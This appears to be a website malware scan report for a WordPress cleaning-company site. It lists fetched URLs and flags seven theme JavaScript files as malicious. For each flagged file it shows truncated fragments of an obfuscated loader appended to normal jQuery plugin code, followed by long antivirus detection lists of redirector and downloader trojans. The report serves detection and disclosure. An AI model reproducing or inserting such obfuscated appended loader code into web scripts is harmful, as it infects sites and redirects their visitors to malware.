Request | Server response | Status |
http://qcleaning.com/ | 200 OK Content-Length: 21830 Content-Type: text/html | clean |
http://qcleaning.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/x-javascript | clean |
http://qcleaning.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://qcleaning.com/wp-content/themes/TheProfessional/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=1.6 | 200 OK Content-Length: 10623 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.et_shortcodes_switcher = function(options) { var defaults = { slides: '>div', activeClass: 'active', linksNav: '', findParent: true, lengthElement: 'li', useArrows: false, arrowLeft: 'a#prev-arrow', arrowRight: 'a#next-arrow', auto: false, autoSpeed: 5000, slidePadding: '', pauseOnHover: true, fx: 'fade', sliderT
... 10517 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- eSafe
- JS.Agent.gnk
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js | 200 OK Content-Length: 185442 Content-Type: text/javascript | clean |
http://qcleaning.com/wp-content/themes/TheProfessional/js/jquery.cycle.all.min.js | 200 OK Content-Length: 30086 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){var ver="2.65";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length==0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero ele
... 28713 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- TROJ_GEN.F47V0517
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- eSafe
- JS.Agent.gnk
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://qcleaning.com/wp-content/themes/TheProfessional/js/jquery.easing.1.3.js | 200 OK Content-Length: 10303 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur
... 6325 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- eSafe
- JS.Agent.gnk
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://qcleaning.com/wp-content/themes/TheProfessional/js/superfish.js | 200 OK Content-Length: 5920 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men
... 5051 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://qcleaning.com/wp-content/themes/TheProfessional/js/jquery.lavalamp.1.3.3-min.js | 200 OK Content-Length: 11130 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(jQuery) { jQuery.fn.lavaLamp = function(o) { o = jQuery.extend({ fx: 'swing', speed: 500, click: function(){return true}, startItem: 'no', autoReturn: true, returnDelay: 0, setOnClick: true, homeTop:0, homeLeft:0, homeWidth:0, homeHeight:0, returnHome:false }, o || {}); var $home; if (o.homeTop || o.homeLeft) { $home = jQuery('
... 4488 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Comodo
- TrojWare.JS.Agent.C
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://qcleaning.com/wp-content/themes/TheProfessional/epanel/page_templates/js/fancybox/jquery.fancybox-1.2.6.pack.js?ver=1.3.2 | 200 OK Content-Length: 11728 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(';(p($){$.q.1Q=p(){J O.2n(p(){n b=$(O).u(\'2o\');8(b.1d(/^3i\\(["\']?(.*\\.2p)["\']?\\)$/i)){b=3j.$1;$(O).u({\'2o\':\'3k\',\'1e\':"3l:3m.3n.3o(3p=D, 3q="+($(O).u(\'3r\'
... 10941 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://qcleaning.com/wp-content/themes/TheProfessional/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 5933 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() { jQuery("a[class^='fancybox']").fancybox({ 'overlayOpacity' : 0.7, 'overlayColor' : '#000000', 'zoomSpeedIn' : 500, 'zoomSpeedOut' : 500 }); var $portfolioItem = jQuery('.et_pt_gallery_entry'); $portfolioItem.find('.et_pt_item_image').css('background-color','#000000'); jQuery('.zoom-icon, .more-icon').css({'opacity':'0','visibility':'visible'}); $portfolioItem.hover(function(){ jQuery(
... 5323 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Bkav
- MW.Clod934.Trojan.7439
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://qcleaning.com/?page_id=2 | 200 OK Content-Length: 14351 Content-Type: text/html | clean |
http://qcleaning.com/wp-includes/js/comment-reply.min.js?ver=3.8.3 | 200 OK Content-Length: 757 Content-Type: application/x-javascript | clean |
http://qcleaning.com/?page_id=29 | 200 OK Content-Length: 14148 Content-Type: text/html | clean |
http://qcleaning.com/?page_id=128 | 200 OK Content-Length: 14501 Content-Type: text/html | clean |